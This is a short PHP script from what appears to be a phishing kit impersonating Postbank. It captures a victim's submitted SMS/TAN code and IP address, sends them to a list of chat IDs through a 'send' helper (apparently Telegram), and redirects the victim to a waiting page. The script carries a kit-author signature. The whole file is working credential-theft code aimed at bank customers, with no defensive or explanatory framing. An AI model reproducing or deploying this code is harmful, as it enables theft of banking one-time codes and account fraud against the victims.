<?php 

require "fun.php";

if(isset($_POST['oneid'])){
$sms = post('oneid');

$res = urlencode("
➡️ POSTBANK SMS/TAN 📲
🌐 Victim IP : ".ip()."

SMS/TAN    : $sms

⚡️丂 卄 卂 ᗪ ㄖ 山 ㄥ 乇 ᘜ 乇 几 ᗪ ™️ ⚡️ 
");
foreach($chat_ids as $chat_id){
	send($res, $chat_id);
}

go("../wait.php?page=SMS");
}



?>